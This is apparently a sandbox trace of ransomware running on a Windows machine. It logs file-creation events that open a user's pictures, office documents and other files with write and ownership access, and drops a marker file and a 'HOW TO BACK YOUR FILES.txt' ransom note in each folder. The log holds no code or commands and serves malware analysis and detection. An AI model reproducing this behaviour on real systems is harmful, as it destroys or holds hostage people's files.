Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\75668a91ce73b054.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\78f0afb5bd4bb278.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\7e4dca80246863e3.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\80d13f95c2c02af9.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\9c08ad74ad8708df.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\9cfafb05ce914942.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\9d1f905ce5044aee.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\b8ab77100df80ab2.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\b8b3a97bfbf120b6.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\d00655d2aa12ff6d.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\fb3b0dbfee58fac8.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\PrintHood\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\PrintHood\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\0dkB4I3aeR0WhEp.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\0NqnB5j6.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\1Rut_CZp95E3.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\2dOcoM_aN0.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\3jFFHm8Ce9nlSPpERMKA.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\4xy1qpl4hklhR.gif desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\6b0 5cwb.gif desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\74BtE9_7W-bUHV-i.bmp desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\8gQHWG8D1b-WZD8.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\8SeBXCtLhthpcg.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\9DYO94n5aNmm9ydACWU.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\a3E6ONcMIha.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\apZJaH9FN.bmp desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\b64pLn92L.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\eKa9s0OxrKnuzW9m_jl.bmp desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\epArqwSa7RO.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\Ex pA.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\FLboYyMvap3QSfr_G.gif desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\hWRjDv4Dj80gAU.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\j7GygMimmKlF.bmp desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\jEdokHr2EgPgrGWyVHAH.bmp desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\jrwTmARnBghnUWTW.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\JSELpO-F0Y.bmp desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\ks9tykG.gif desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\kuXIqR7PtqeMEg4X.gif desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\Lf YVLL3lHH9mBY.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\M FAL8HMMU.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\nKAALB7g8JVy3bNicZAV.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\ns2m9GT_sYgG6NU.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\qQZElOqALjjZs185FSJ.bmp desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\QrmX5zar4TeL3G.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\Sv PS_0og2kRetH-P.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\T4b_BS -CrryhZvHxt.bmp desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\t6mmG49Ik.bmp desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\UpDUBx3NVg2.gif desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\v4ZDHE a-uoAR3Cw_zY0.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\Zo_fD_dUydT2ng.gif desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\_tGw8TZHXe.jpg desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\Saved Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\Saved Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\Camera Roll\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Pictures\Camera Roll\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\OneDrive\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\OneDrive\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\NetHood\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\NetHood\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\-HEK-DXQ3wmbagAJfJY.pptx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\BZ4TrAu8yl96JSfZ.pptx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\cHQW.ods desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\cxezl6TYX11ixWRNjCV.docx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\Database1.accdb desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\dj05M a9Ph9ACFyExLrh.docx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\F4NHuiDmUc26bw37Go.xlsx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\FhduDA Hp_S.pptx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\FMoEmzd4.docx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hGEAu7lMb4Z5lAjdw.pptx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\Hy99X-RH7W-oRpNxJm.pptx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\IZ-akFBweN.xlsx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\mYd7cywDST.docx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\o30CQCuB8bdhHb.ots desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\oyjGs-vsR B9HxSBTe.xlsx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
